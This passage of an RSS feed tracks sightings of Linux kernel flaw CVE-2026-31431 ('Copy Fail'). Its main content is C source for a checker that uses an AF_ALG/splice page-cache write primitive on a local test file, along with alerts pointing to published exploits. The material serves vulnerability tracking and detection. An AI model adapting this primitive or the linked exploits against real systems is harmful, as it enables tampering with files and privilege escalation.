(void)argc; (void)argv;\n    const char *target = \"testfile\";\n\n    init_file(target);\n    sync();\n    check_file(target);\n\n    int file_fd = open(target, O_RDONLY);\n    if (file_fd &amp;lt; 0) {\n        fprintf(stderr, \"open(%s): %s\\n\", target, strerror(errno));\n        unlink(target);\n        return 1;\n    }\n\n    size_t iters = (PAYLOAD_LEN + 3) / 4;\n\n    fprintf(stderr, \"[+] target:    %s\\n\", target);\n    fprintf(stderr, \"[+] payload:   %zu bytes (%zu iterations)\\n\",\n            PAYLOAD_LEN, iters);\n\n    /* Walk the payload in 4-byte windows. 
window[] is 5 bytes so the\n     * trailing zero acts as a NUL terminator for the %s log below. */\n    for (off_t off = 0; (size_t)off &amp;lt; PAYLOAD_LEN; off += 4) {\n        unsigned char window[5] = { 0, 0, 0, 0, 0 };\n        size_t take = (PAYLOAD_LEN - (size_t)off &amp;gt;= 4)\n                      ? 4 : PAYLOAD_LEN - (size_t)off;\n        memcpy(window, PAYLOAD + off, take);\n\n        fprintf(stderr, \"[+] patch fd=%d off=%lld bytes=\\\"%s\\\"\\n\",\n                file_fd, (long long)off, window);\n        if (patch_chunk(file_fd, off, window) &amp;lt; 0) {\n            int ret;\n            if (errno == EAFNOSUPPORT) {\n                fprintf(stderr,\n                        \"[?] AF_ALG socket family unavailable; kernel patch \"\n                        \"state cannot be determined from this test\\n\");\n                ret = 2;\n            } else if (errno == ENOENT) {\n                fprintf(stderr,\n                        \"[?] AF_ALG authencesn template not registered; \"\n                        \"kernel patch state cannot be determined from this \"\n                        \"test\\n\");\n                ret = 2;\n            } else {\n                fprintf(stderr, \"[-] patch_chunk failed at offset %lld\\n\",\n                        (long long)off);\n                ret = 1;\n            }\n\n            close(file_fd);\n            unlink(target);\n            return ret;\n        }\n        fprintf(stderr, \"[+] patch ok\\n\");\n    }\n\n    close(file_fd);\n\n    fprintf(stderr, \"[+] page cache mutated\\n\");\n\n    int vulnerable = check_file(target);\n    unlink(target);\n\n    if (vulnerable) {\n        fprintf(stderr, \"[!] VULNERABLE\\n\");\n        return 100;\n    }\n\n    fprintf(stderr, \"[+] not vulnerable :)\\n\");\n    return 0;\n}", "creation_timestamp": "2026-06-04T07:22:41.000000Z"}</description>
      <content:encoded>{"uuid": "eeea1d39-2102-4e2c-bf7f-42510e37beec", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/spynika/e452783668ff5a7a3dc4cc036d3f9463", "content": "/* SPDX-License-Identifier: LGPL-2.1-or-later OR MIT */\n/*\n * Copy Fail -- CVE-2026-31431\n * Vulnerability checker.\n *\n * Detects whether the running kernel is susceptible to the AF_ALG/splice\n * page-cache mutation primitive used by exploit.c and exploit-passwd.c,\n * without touching any system file. Creates a local \"testfile\" in the\n * working directory containing the string \"init\", then runs the same\n * patch_chunk() primitive against its page cache to attempt to overwrite\n * the bytes with \"vulnerable\". Reads back to confirm whether the\n * mutation took.\n *\n * The on-disk inode is never modified; the testfile is removed on exit,\n * and the page-cache mutation evaporates with it. 
Runs unprivileged.\n *\n * Exit codes:\n *   100 - kernel is vulnerable\n *   0   - kernel is not vulnerable (primitive ran but mutation did not take)\n *   2   - AF_ALG socket family or authencesn template is unavailable;\n *         patch state cannot be determined from this test\n *   1   - other runtime error\n */\n\n#define _GNU_SOURCE\n#include \n#include \n#include \n#include \n#include \n#include \n\n#include \n\n#include \"utils.h\"\n\nstatic const char PAYLOAD[] = \"vulnerable\";\n#define PAYLOAD_LEN (sizeof PAYLOAD - 1)\n\nstatic int check_file(const char *filename) {\n    int fd = open(filename, O_RDONLY);\n    if (fd &amp;lt; 0) return 0;\n    printf(\"content of %s fd=%d ---\\n\", filename, fd);\n    char buf[256];\n    ssize_t total = read(fd, buf, sizeof buf);\n    if (total &amp;gt; 0)\n        write(STDOUT_FILENO, buf, total);\n    close(fd);\n    printf(\"\\n---\\n\");\n    return total &amp;gt;= (ssize_t)PAYLOAD_LEN &amp;amp;&amp;amp;\n           memcmp(buf, PAYLOAD, PAYLOAD_LEN) == 0;\n}\n\nstatic void init_file(const char *filename) {\n    static const char init_buf[32] = \"init\";\n    int fd = open(filename, O_RDWR | O_CREAT | O_TRUNC, 0644);\n    if (fd &amp;lt; 0) {\n        fprintf(stderr, \"open(%s): %s\\n\", filename, strerror(errno));\n        exit(1);\n    }\n    write(fd, init_buf, sizeof init_buf);\n    close(fd);\n}\n\nint main(int argc, char **argv) {\n    (void)argc; (void)argv;\n    const char *target = \"testfile\";\n\n    init_file(target);\n    sync();\n    check_file(target);\n\n    int file_fd = open(target, O_RDONLY);\n    if (file_fd &amp;lt; 0) {\n        fprintf(stderr, \"open(%s): %s\\n\", target, strerror(errno));\n        unlink(target);\n        return 1;\n    }\n\n    size_t iters = (PAYLOAD_LEN + 3) / 4;\n\n    fprintf(stderr, \"[+] target:    %s\\n\", target);\n    fprintf(stderr, \"[+] payload:   %zu bytes (%zu iterations)\\n\",\n            PAYLOAD_LEN, iters);\n\n    /* Walk the payload in 4-byte windows. 
window[] is 5 bytes so the\n     * trailing zero acts as a NUL terminator for the %s log below. */\n    for (off_t off = 0; (size_t)off &amp;lt; PAYLOAD_LEN; off += 4) {\n        unsigned char window[5] = { 0, 0, 0, 0, 0 };\n        size_t take = (PAYLOAD_LEN - (size_t)off &amp;gt;= 4)\n                      ? 4 : PAYLOAD_LEN - (size_t)off;\n        memcpy(window, PAYLOAD + off, take);\n\n        fprintf(stderr, \"[+] patch fd=%d off=%lld bytes=\\\"%s\\\"\\n\",\n                file_fd, (long long)off, window);\n        if (patch_chunk(file_fd, off, window) &amp;lt; 0) {\n            int ret;\n            if (errno == EAFNOSUPPORT) {\n                fprintf(stderr,\n                        \"[?] AF_ALG socket family unavailable; kernel patch \"\n                        \"state cannot be determined from this test\\n\");\n                ret = 2;\n            } else if (errno == ENOENT) {\n                fprintf(stderr,\n                        \"[?] AF_ALG authencesn template not registered; \"\n                        \"kernel patch state cannot be determined from this \"\n                        \"test\\n\");\n                ret = 2;\n            } else {\n                fprintf(stderr, \"[-] patch_chunk failed at offset %lld\\n\",\n                        (long long)off);\n                ret = 1;\n            }\n\n            close(file_fd);\n            unlink(target);\n            return ret;\n        }\n        fprintf(stderr, \"[+] patch ok\\n\");\n    }\n\n    close(file_fd);\n\n    fprintf(stderr, \"[+] page cache mutated\\n\");\n\n    int vulnerable = check_file(target);\n    unlink(target);\n\n    if (vulnerable) {\n        fprintf(stderr, \"[!] VULNERABLE\\n\");\n        return 100;\n    }\n\n    fprintf(stderr, \"[+] not vulnerable :)\\n\");\n    return 0;\n}", "creation_timestamp": "2026-06-04T07:22:41.000000Z"}</content:encoded>
      <guid isPermaLink="false">https://vulnerability.circl.lu/sighting/eeea1d39-2102-4e2c-bf7f-42510e37beec/export</guid>
      <pubDate>Thu, 04 Jun 2026 07:22:41 +0000</pubDate>
    </item>
    <item>
      <title>aef80f67-0e53-4b34-bf53-75885348b67d</title>
      <link>https://vulnerability.circl.lu/sighting/aef80f67-0e53-4b34-bf53-75885348b67d/export</link>
      <description>{"uuid": "aef80f67-0e53-4b34-bf53-75885348b67d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/87353", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #Exploit #CVE\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a copy-fail-CVE-2026-31431\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a zs1n\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Python\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-06-05 01:06:02\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nExploit for Copy-Fail Vulnerability - Python3 Version\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-06-05T01:07:13.000000Z"}</description>
      <content:encoded>{"uuid": "aef80f67-0e53-4b34-bf53-75885348b67d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/87353", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #Exploit #CVE\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a copy-fail-CVE-2026-31431\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a zs1n\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Python\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-06-05 01:06:02\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nExploit for Copy-Fail Vulnerability - Python3 Version\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-06-05T01:07:13.000000Z"}</content:encoded>
      <guid isPermaLink="false">https://vulnerability.circl.lu/sighting/aef80f67-0e53-4b34-bf53-75885348b67d/export</guid>
      <pubDate>Fri, 05 Jun 2026 01:07:13 +0000</pubDate>
    </item>
    <item>
      <title>918e2870-5e1d-45ca-876a-34ec3976e654</title>
      <link>https://vulnerability.circl.lu/sighting/918e2870-5e1d-45ca-876a-34ec3976e654/export</link>
      <description>{"uuid": "918e2870-5e1d-45ca-876a-34ec3976e654", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "Telegram/2GKVzEdq0Q1GgXdde3R68qhjmtmEcsIfO4W2udc5u2OvA5M", "content": "", "creation_timestamp": "2026-06-05T09:00:04.000000Z"}</description>
      <content:encoded>{"uuid": "918e2870-5e1d-45ca-876a-34ec3976e654", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "Telegram/2GKVzEdq0Q1GgXdde3R68qhjmtmEcsIfO4W2udc5u2OvA5M", "content": "", "creation_timestamp": "2026-06-05T09:00:04.000000Z"}</content:encoded>
      <guid isPermaLink="false">https://vulnerability.circl.lu/sighting/918e2870-5e1d-45ca-876a-34ec3976e654/export</guid>
      <pubDate>Fri, 05 Jun 2026 09:00:04 +0000</pubDate>
    </item>
    <item>
      <title>56478d6d-f0df-4e77-985a-90d1f9f88bfd</title>
      <link>https://vulnerability.circl.lu/sighting/56478d6d-f0df-4e77-985a-90d1f9f88bfd/export</link>
      <description>{"uuid": "56478d6d-f0df-4e77-985a-90d1f9f88bfd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/stefketels.vrk.social/post/3mnkibm5dxcn3", "content": "Ik draai al te lang mee om mee spelen in religieuze OS-oorlogen, maar dat laatste statement vind ik zeer ver gaan. Ik neem aan dat u het over CVE-2026-31431 (\"Copy Fail\") heeft?  Er was een mainline fix negen dagen na het rapport en 28 dagen voor de afgesproken public disclosure.  /1", "creation_timestamp": "2026-06-05T15:46:12.346690Z"}</description>
      <content:encoded>{"uuid": "56478d6d-f0df-4e77-985a-90d1f9f88bfd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/stefketels.vrk.social/post/3mnkibm5dxcn3", "content": "Ik draai al te lang mee om mee spelen in religieuze OS-oorlogen, maar dat laatste statement vind ik zeer ver gaan. Ik neem aan dat u het over CVE-2026-31431 (\"Copy Fail\") heeft?  Er was een mainline fix negen dagen na het rapport en 28 dagen voor de afgesproken public disclosure.  /1", "creation_timestamp": "2026-06-05T15:46:12.346690Z"}</content:encoded>
      <guid isPermaLink="false">https://vulnerability.circl.lu/sighting/56478d6d-f0df-4e77-985a-90d1f9f88bfd/export</guid>
      <pubDate>Fri, 05 Jun 2026 15:46:12 +0000</pubDate>
    </item>
  </channel>
</rss>
